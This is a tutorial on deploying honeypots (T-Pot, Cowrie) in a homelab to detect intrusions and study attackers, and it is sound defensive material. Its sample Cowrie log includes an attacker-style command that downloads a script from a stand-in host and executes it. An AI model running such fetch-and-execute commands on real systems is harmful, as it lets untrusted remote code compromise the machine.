What Is a Homelab Honeypot?
A honeypot is a decoy service that lures attackers. Learn how to deploy honeypots in your homelab to detect intrusions, gather threat intelligence, and use popular tools like T-Pot.
1. What Is a Honeypot?
A **honeypot** is a service designed to look like a real, valuable target — but it's actually a trap. Its purpose is to attract attackers, detect intrusion attempts, and study attacker behavior.
Unlike traditional security tools that block attacks, a honeypot **records everything an attacker does**. Every login attempt, every command they run, every file they upload — all logged for analysis. This gives you real-world intelligence about who's probing your network and what techniques they're using.
2. Why Deploy a Honeypot in Your Homelab?
🔍 Early warning system
If someone probes your honeypot, you know your network is being scanned. This gives you time to investigate before a real attack succeeds.
🕵️ Threat intelligence
See exactly which IP addresses are attacking, what username/password combinations they're trying, and what exploitation techniques they use.
📊 Baseline your normal traffic
A honeypot on an unused IP (no legitimate traffic) should receive zero connections. Any hits = malicious scanning.
📚 Learn attacker techniques
Honeypots are a safe way to study how attackers operate — no risk to your real services.
🛡️ Complement your IDS
While IDS (Intrusion Detection System) looks for bad traffic on real services, a honeypot catches attackers that slip past — probing ports your IDS isn't monitoring.
3. Types of Honeypots
Honeypots range from simple to sophisticated:
| Type | Description | Complexity | Best For |
|---|---|---|---|
| Low-interaction | Simulates basic services (SSH, HTTP, FTP). Limited attacker interaction but safe and easy to deploy. | Low | Homelabs, beginners |
| High-interaction | Full real services or VMs. Attackers can do almost anything — provides deep insight but higher risk if compromised. | High | Advanced users, researchers |
| Production honeypots | Integrated into your real network to detect attackers early. Honeypots on unused IPs catch scanning. | Medium | Homelab security |
| Research honeypots | Academic or research deployments to study attacker behavior at scale. Long-term, high-fidelity. | Very High | Security researchers |
4. Deploy T-Pot (All-in-One Honeypot Suite)
**T-Pot** is the most popular open-source honeypot framework. It runs 15+ honeypot services simultaneously in Docker containers, with a Kibana dashboard for analysis.
T-Pot includes Cowrie (SSH/Telnet), Dionaea (malware honeypot), and honeypots for HTTP, SMTP, FTP, VNC, Redis, and more.
Allocate an unused IP on your network
T-Pot should run on an IP that has no legitimate services. This way, any connection to it is automatically suspicious. Configure your DHCP server to reserve this IP.
Install T-Pot on Ubuntu Server
T-Pot provides an ISO installer, but you can also install on Ubuntu Server using their installer script.
```bash
# Install T-Pot on Ubuntu 22.04/24.04
sudo apt-get update && sudo apt-get dist-upgrade -y

# Option A: the T-Pot ISO, intended for a fresh install on a dedicated machine
wget https://github.com/telekom-security/tpotce/releases/latest/download/tpot.iso

# Option B: Docker-based install on an existing Ubuntu host (recommended for a homelab)
git clone https://github.com/telekom-security/tpotce.git
cd tpotce
sudo ./install.sh --type=user
```
Configure T-Pot
After installation, access the T-Pot web interface (Kibana dashboard) at https://your-tpot-ip:64297. Default credentials are in /opt/tpot/etc/tpot.yml.
```text
# Default web credentials
username: admin
password: (check /opt/tpot/etc/tpot.yml)

# Access Kibana dashboard
https://192.168.1.xx:64297
```
Let it run and watch
T-Pot will start capturing attacks immediately. Within hours to days, you'll see brute-force SSH attempts, port scans, and exploitation attempts against simulated services. Review the attacks in Kibana — filter by source IP, honeypot type, and attack type.
5. Deploy Cowrie (SSH/Telnet Honeypot)
If T-Pot is too heavy, **Cowrie** is an excellent lightweight SSH honeypot. It simulates a fake Linux server with SSH and records every command the attacker runs.
Cowrie is perfect for a Homelab because it's easy to deploy, runs in Docker, and provides highly detailed logs of attacker behavior.
Deploy Cowrie in Docker
Run Cowrie as a Docker container. Change the SSH port on your real server to something else, then redirect port 22 to Cowrie.
```bash
# The official cowrie/cowrie image listens on 2222 (SSH) and 2223 (Telnet);
# map host port 23 to the image's 2223. Logs, tty recordings and captured
# downloads live under /cowrie/cowrie-git/var, so persist that path.
docker run -d \
  --name cowrie \
  -p 2222:2222 \
  -p 23:2223 \
  -v cowrie-var:/cowrie/cowrie-git/var \
  --restart unless-stopped \
  cowrie/cowrie:latest
```
Redirect SSH traffic to Cowrie
Change your real SSH to a different port, then redirect port 22 to Cowrie.
```bash
# Change real SSH port (confirm you can log in on 22222 before redirecting 22,
# or you lock yourself out)
sudo sed -i "s/#Port 22/Port 22222/" /etc/ssh/sshd_config
sudo systemctl restart sshd
# On Ubuntu 24.04 sshd is socket-activated: the Port directive in sshd_config is
# ignored until ssh.socket is adjusted or disabled.

# Redirect port 22 → Cowrie's published port 2222
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
```
Check Cowrie logs
Cowrie logs all attacker commands and downloaded files. Review them regularly.
```bash
# Paths below are those of the official cowrie/cowrie image.
# List attacker session recordings (binary tty format; replay with bin/playlog
# inside the container rather than cat)
docker exec cowrie ls -lt /cowrie/cowrie-git/var/lib/cowrie/tty | head

# View the last 50 lines of the main Cowrie log
docker exec cowrie tail -n 50 /cowrie/cowrie-git/var/log/cowrie/cowrie.log

# Attackers typically try common root/admin logins:
docker exec cowrie grep "login attempt" /cowrie/cowrie-git/var/log/cowrie/cowrie.log \
  | grep -oE "root|admin|ubuntu|user|test" | sort | uniq -c | sort -rn
```
Watch what attackers actually do
The first thing most attackers do after logging in is run: wget/curl to download a script, chmod +x, and execute it. Cowrie captures all of this. You'll see exactly what malware they try to install on your fake server.
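Beyond grepping the text log, Cowrie also writes a JSON event log (`var/log/cowrie/cowrie.json`) that is easier to analyze. The following added example (not part of the original article or the Cowrie project) parses a constructed sample of that log and reports what the sections above and the FAQ describe: usernames tried, attempts per source IP, download URLs, and whether each session stopped at brute force or went on to the wget/curl-then-execute stage. The event ids and field names are Cowrie's; all IPs, session ids, commands and the hash are made up.

```python
import json
from collections import Counter

# Constructed sample of Cowrie's JSON log (var/log/cowrie/cowrie.json), one event per line.
# Event ids and field names are Cowrie's; IPs, session ids, commands and the hash are made up.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"root","password":"123456","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"admin","password":"admin","session":"a1"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.7","username":"root","password":"toor","session":"a1"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","input":"wget http://198.51.100.9/x.sh -O /tmp/x.sh","session":"a1"}
{"eventid":"cowrie.session.file_download","src_ip":"203.0.113.7","url":"http://198.51.100.9/x.sh","shasum":"PLACEHOLDER_SHA256","session":"a1"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","input":"chmod +x /tmp/x.sh; /tmp/x.sh","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","username":"ubuntu","password":"ubuntu","session":"b2"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","username":"root","password":"root","session":"b2"}
"""

def parse_events(text):
    """Parse a JSON-lines Cowrie log, skipping blank or malformed lines instead of aborting."""
    events = []
    for line in text.splitlines():
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events

def summarize(events):
    """Count usernames tried and login attempts per source IP, collect download URLs,
    and classify each session by how far it got (the pattern the FAQ describes)."""
    usernames, attempts_by_ip, downloads, sessions = Counter(), Counter(), [], {}
    for ev in events:
        s = sessions.setdefault(ev.get("session"), {"login": False, "fetched": False, "commands": []})
        eid = ev.get("eventid")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            usernames[ev.get("username", "")] += 1
            attempts_by_ip[ev.get("src_ip", "?")] += 1
            s["login"] = s["login"] or eid == "cowrie.login.success"
        elif eid == "cowrie.command.input":
            cmd = ev.get("input", "")
            s["commands"].append(cmd)
            s["fetched"] = s["fetched"] or cmd.lstrip().startswith(("wget", "curl"))
        elif eid == "cowrie.session.file_download":
            downloads.append(ev.get("url"))
            s["fetched"] = True
    stage = {sid: "download-and-execute" if s["fetched"] else "interactive" if s["login"] else "brute-force-only"
             for sid, s in sessions.items()}
    return {"usernames": usernames, "attempts_by_ip": attempts_by_ip, "downloads": downloads,
            "stage": stage, "sessions": sessions}
```

To run it against a live honeypot, replace `SAMPLE_LOG` with the contents of `docker exec cowrie cat /cowrie/cowrie-git/var/log/cowrie/cowrie.json`.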
Frequently Asked Questions
Is a honeypot legal?
Running a honeypot is generally legal in most jurisdictions as long as you're only monitoring (not entrapment) on your own network. You're not enticing people to attack — you're observing attacks on a decoy service. However, recording attacker IP addresses may have privacy implications depending on your local laws. Consult legal advice if you're deploying at scale or in a commercial environment.
Can a honeypot be used to attack me?
A well-configured honeypot cannot be used to attack others. Honeypots only accept connections — they don't initiate outbound connections to external systems (unless you configure them to). Low-interaction honeypots like Cowrie are specifically designed to be safe — they simulate services but don't execute attacker commands as privileged users.
How do I know if a honeypot is being attacked?
On a honeypot with no legitimate traffic (like an unused IP), any connection is suspicious. If you run a honeypot on port 22 (SSH) on your real IP, expect thousands of automated attacks within 24 hours — this is normal. If you suddenly stop seeing attacks on a honeypot that previously had them, an attacker may have noticed and moved on.
Should I deploy a honeypot in my DMZ or Homelab VLAN?
Best practice: deploy a honeypot on a dedicated VLAN with its own firewall rules, isolated from both your DMZ and Homelab VLAN. The honeypot should only have internet access, not internal network access. Even if an attacker escapes the honeypot (rare but possible with high-interaction honeypots), they're contained in their own isolated VLAN.
What do attackers usually try on SSH honeypots?
The vast majority of SSH honeypot attacks are automated: (1) Brute-force common username/password combinations (root/admin/ubuntu), (2) Download and execute malware scripts (cryptominers are most common), (3) Set up persistent backdoors. Very few are targeted human attacks — automated bots account for 99%+ of honeypot traffic.